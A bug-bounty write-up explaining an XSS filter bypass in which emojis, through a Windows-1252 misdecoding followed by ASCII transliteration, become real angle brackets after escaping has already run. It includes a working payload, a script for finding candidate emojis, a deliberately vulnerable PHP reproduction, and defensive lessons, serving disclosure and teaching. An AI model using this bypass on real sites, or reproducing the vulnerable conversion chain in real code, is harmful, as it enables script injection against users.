When emojis cause XSS

2025-09-21

Vulnerability description

During a bug bounty investigation, we discovered an XSS vulnerability that, surprisingly, could be exploited using emojis. The input parameters seemed secure at first glance: the system removed most malicious characters, so the vulnerability was not obvious.

We were inspired by a technique shared in the community that was based on Unicode characters. We retested the domain, and although the method did not work directly, we got unexpected results when trying out some emojis: special quotation marks and apostrophes appeared in the response. For example, one string looked like this: d"Y’".

Using an open source emoji database, we discovered that certain emojis produce characters that are later converted into the angle brackets (< and >) that open and close HTML tags. This is how the working payload was created:

💋img src=x onerror=alert(document.domain)//💛
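To illustrate how such candidate emojis can be found without a full emoji database, here is a minimal Python sketch. It assumes the server misreads UTF-8 input as Windows-1252 (which is what our later analysis showed) and looks for code points whose last byte is then read as ‹ (U+2039) or › (U+203A). The function names and the scanned range are our own choices for illustration, not part of the original tooling.

```python
def misread_as_cp1252(ch: str):
    """Decode ch's UTF-8 bytes as Windows-1252; None if a byte is undefined there."""
    try:
        return ch.encode("utf-8").decode("cp1252")
    except UnicodeDecodeError:
        return None


def find_candidates(start: int, end: int):
    """Collect code points whose misread form ends in ‹ (opener) or › (closer)."""
    openers, closers = [], []
    for cp in range(start, end + 1):
        misread = misread_as_cp1252(chr(cp))
        if misread is None:
            continue  # a strict Windows-1252 decoder would reject this input
        if misread.endswith("\u2039"):
            openers.append(chr(cp))
        elif misread.endswith("\u203a"):
            closers.append(chr(cp))
    return openers, closers


# Hypothetical scan range: one block of emoji code points.
openers, closers = find_candidates(0x1F400, 0x1F4FF)
print("openers:", [f"U+{ord(c):04X}" for c in openers])
print("closers:", [f"U+{ord(c):04X}" for c in closers])
```

In this range the scan finds 💋 (U+1F48B) among the openers and 💛 (U+1F49B) among the closers, which are the two emojis used in the payload.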

Why did it work?

To better understand what was happening in the background, we created a simple test page. It turned out that after removing the malicious characters, the server performed an incorrect encoding conversion: it treated the input as Windows-1252 and converted it to UTF-8, even though the input was already UTF-8. This did not produce a real < character, but a lookalike Unicode character: ‹ (U+2039, the single left-pointing angle quotation mark), which Windows-1252 assigns to byte 0x8B, the last byte of 💋 in UTF-8.

The system then performed a second conversion, from UTF-8 to ASCII with transliteration. During this step, that character was replaced with an actual <, after the filtering had already run, and this is exactly what opened the door to the exploit.
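The two conversions can be traced step by step with a small Python sketch. The first step uses Python's own cp1252 codec; the second step is only an approximation: the TRANSLIT table below is our assumption of what an iconv ASCII//TRANSLIT implementation such as glibc's does for the handful of characters involved, and real results depend on the platform.

```python
# Assumed transliterations for the few characters that matter here;
# this is not a complete or authoritative ASCII//TRANSLIT table.
TRANSLIT = {
    "\u00f0": "d",  # ð
    "\u0178": "Y",  # Ÿ
    "\u2019": "'",  # ’
    "\u2039": "<",  # ‹
    "\u203a": ">",  # ›
}


def misdecode(text: str) -> str:
    """Step 1: UTF-8 bytes wrongly interpreted as Windows-1252."""
    return text.encode("utf-8").decode("cp1252")


def to_ascii(text: str) -> str:
    """Step 2: approximate transliteration to ASCII ('?' for unknown characters)."""
    return "".join(c if ord(c) < 128 else TRANSLIT.get(c, "?") for c in text)


payload = "\U0001F48Bimg src=x onerror=alert(document.domain)//\U0001F49B"

step1 = misdecode(payload)
step2 = to_ascii(step1)

print(payload.encode("utf-8")[:4].hex(" "))  # UTF-8 bytes of the first emoji
print(step1)
print(step2)
```

Under these assumptions the final string starts with `dY'<img` and ends with `dY'>`, so the response contains a complete img tag even though the request never contained an angle bracket.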

A simple PHP example from the test environment that reproduces the issue:

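<?php

// Escape HTML special characters first; a real < or > would be neutralized here.
$str = isset($_GET["str"]) ? htmlspecialchars($_GET["str"]) : "";

// Bug: the input is already UTF-8, but it is treated as Windows-1252.
$str = iconv('Windows-1252', "UTF-8", $str);
// Transliteration to ASCII runs after escaping and can produce new < and > characters.
$str = iconv('UTF-8', "ASCII//TRANSLIT", $str);

echo "String: " . $str;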

Lessons learned

  • A chain of encoding conversions and normalizations can easily lead to unexpected character transformations that bypass input filtering.
  • An emoji or other Unicode character can also generate a byte sequence that becomes a special HTML character during processing.
  • Consistent input encoding and consistent normalization checks are required throughout the entire processing chain.
  • Output escaping must always be adapted to the specific context.
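One way to apply these lessons is to decode the input exactly once and to escape as the very last step, after any conversion. The following Python sketch shows the idea under our own assumptions: the function names are hypothetical, and the `convert` parameter stands in for whatever legacy conversion a system cannot avoid.

```python
import html


def decode_request_bytes(raw: bytes) -> str:
    """Decode once, strictly, as UTF-8; invalid input raises UnicodeDecodeError."""
    return raw.decode("utf-8", errors="strict")


def render(text: str, convert=lambda s: s) -> str:
    """Run any conversion first, then escape for an HTML text context last."""
    return "String: " + html.escape(convert(text), quote=True)


# Stand-in for a lossy conversion that turns a lookalike into a real bracket.
def lossy(s: str) -> str:
    return s.replace("\u2039", "<").replace("\u203a", ">")


text = decode_request_bytes("\u2039img src=x\u203a".encode("utf-8"))
print(render(text, convert=lossy))
```

Because escaping runs after the conversion, the brackets it introduces are emitted as `&lt;` and `&gt;` instead of markup. This covers an HTML text context only; attribute, URL, or script contexts need their own escaping.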

This case highlights that security issues do not always stem from classic errors; sometimes a single emoji can be enough for a successful XSS attack.

Sources

Abusing unicode characters to PWN Intigriti XSS challenge

Unicode representations of emoji characters


